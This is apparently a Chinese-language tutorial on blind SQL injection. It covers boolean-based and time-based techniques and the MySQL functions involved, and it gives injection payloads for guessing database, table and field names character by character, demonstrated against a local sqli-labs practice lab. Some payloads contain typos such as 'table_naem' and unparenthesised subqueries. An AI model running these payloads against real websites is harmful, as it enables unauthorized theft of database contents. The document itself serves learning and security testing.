什么是盲注
普通的sql注入有相应的页面返回,而盲注没有相应的回显,比如报错信息等。
盲注分类:
- 布尔盲注
特点:根据注入信息只会返回ture和false。
解决方案:根据结果判断是否和自己输入的值一直从而拆解出完整的数据。
- 时间盲注
特点:界面只返回ture值,无论输入任何值,返回情况都会按正常的来处理。
解决方案:加入特定的时间函数,通过web页面返回的时间差判断注入的语句是否正确。
盲注涉及的函数
- length() 返回字符串长度
- substr(str,num1,num2) 窃取字符串
- ascii() 返回字符的ascii码
- sleep(n) 将程序休眠n秒钟
- if(expr1,expr2,expr3) 判断语句,如果语句1正确则执行语句二,反之则执行语句3
注入流程
1.判断注入点
2.爆字段数
3.爆字段显示位
4.爆库 (先猜长度,再猜名字)
5.爆表 (先猜长度,再猜名字)
6.爆字段 (先猜长度,再猜名字)
7.爆内容 (先猜数据的记录数,再对每个字段的长度和数据进行猜解)
sql布尔盲注
判断注入点
and 1=1 返回正常;and 1=2 返回错误。
是个注入点,但没返回出执行结果,判断为盲注。
爆库
先猜数据库名字长度
? id = 1 and length(database())> 猜测数字 --+
这样不断的猜,最后猜出数据库名字长度。
再猜解数据库名字
? id = 1 and (ascii(substr(database(),1,1)))> 猜出数字 -- +
这样就猜解出数据库名字第一个字母
? id = 1 and (ascii(substr(database(),2,1)))>猜出数字 -- +
这样就猜解出数据库名字第二个字母
…
这样就猜解出了数据库名字
爆表
先猜表名长度
? id = 1 and (length(select table_naem from information_schema.tables where table_schema = database() ))>猜测数字 --+
再猜表名
? id = 1 and (ascii(substr(select table_naem from information_schema.tables where table_schema = database() ,1,1)))> 猜测数字 --+
爆字段
原理同上
爆内容
原理同上
由于过程较于复杂,这里就不一一例举了,原理大致和上面相同。
sql时间盲注
sql时间盲注则和布尔盲注类似,只是页面返回没有ture和false,只会返回正常页面。这时只要在次基础上添加个时间判断
即可。
比如爆库的时候
if条件语句判断,如果ascii>116,则执行0,反之则执行sleep(3)休眠3秒。这里的0只是个占位符作用,没其他含义,也可以换成其他数字。
192.168.0.63/sqli-labs/Less-8/?id=1' and if(ascii(substr(database(),1,1))>116,0,sleep(3))--+
由上图可见,时间执行超过3秒,说明数据库名字的第一个字母是不大于116的。
这样不断的尝试就可以测出数据库名字了
注:
这上面的这个单引号 '
,一定不能少,这是闭合前面的sql语句用的。